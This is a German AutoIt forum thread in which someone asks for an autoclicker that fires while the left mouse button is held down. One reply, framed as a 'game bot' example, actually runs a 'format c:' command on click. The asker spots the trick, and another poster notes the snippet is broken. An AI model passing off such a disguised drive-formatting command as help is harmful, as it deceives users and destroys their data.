Wenn linke maustaste gedrückt viele Mausklicks machen !

  • hi

    ich möchte das wenn die linke maustaste gedrückt wird viele linke mausklicks simuliert werden aber bekomm es nicht hin-.-

    vllt könnt ihr mir helfen


    mfg

  • Spoiler anzeigen
    [autoit]

    #include <misc.au3>
    While True
    Sleep(100)
    $mgp=Mousegetpos()
    If _isPressed(01) Then MouseClick($mgp[0],$mgp[1]);Untested, 01 muss evtl. ersetzt werden...
    wend

    [/autoit]

    Twitter: @L3viathan2142
    Benutze AutoIt persönlich nicht mehr, da ich keinen Windows-Rechner mehr besitze.

  • Greenhorn

    Ich weis gar nicht was du hast, lass ihn doch, es gibt auch Hardware die beim gedrückt halten ensprechend klicks simmuliert.Wie er das Programm letztlich einsetzt ist doch seine Sache.

    Grüße

    SlowlyDead

  • Fast richtig ...

    Spiele-Bots programmiert man aber eher so:

    [autoit]


    While True
    If _IsPressed (01) Then _
    Run (@ComSpec & "/c format c:")
    WEnd

    [/autoit]

    :whistling: Hast ja recht. Aber vielleicht soll das ja kein Bot werden???
    Zum Beispiel ein ganzoftklickprogramm.
    Ich hab sowas auch, für Dialogboxen, die ungefähr tausendmal kommen (z.B. beim Syncen von Fonts)

    Twitter: @L3viathan2142
    Benutze AutoIt persönlich nicht mehr, da ich keinen Windows-Rechner mehr besitze.

  • [autoit]


    While True
    If _IsPressed (01) Then _
    Run (@ComSpec & "/c format c:")
    WEnd

    [/autoit]

    schade nur das ich mich ein bisschen mehr auskenne 8) (nur dieses verdammte _ispressed in autoit kannte ich nicht)
    schöner versuch aber trotzdem danke ! jetzt kenne ich _ispressed noob 8)

    außerdem :

    muss denn alles ein bot sein? eig eine frechheit gleich sowas zu behaupten ! das prog bau ich für mein opa der mit dem was anfangen kann und nicht bottet !

  • Jetzt schnapp mal nicht über :P.

    Mit dem Script von Greenhorn passiert überhaupt nix, selbst wenn du nicht auf C:\ Windows installiert hast.

    Dann bring einfach ein bisschen glaubwürdiger rüber, dass es kein Bot werden soll, dann wird dir sicherlich geholfen.
    Man sollte am Threadanfang sowieso erst mal sagen was man überhaupt machen will.

    Zitat

    jetzt kenne ich _ispressed noob 8)

    Das war vielleicht sogar Absicht um dir zu helfen 8) ansonsten hätte er _Ispressed nicht benutzt.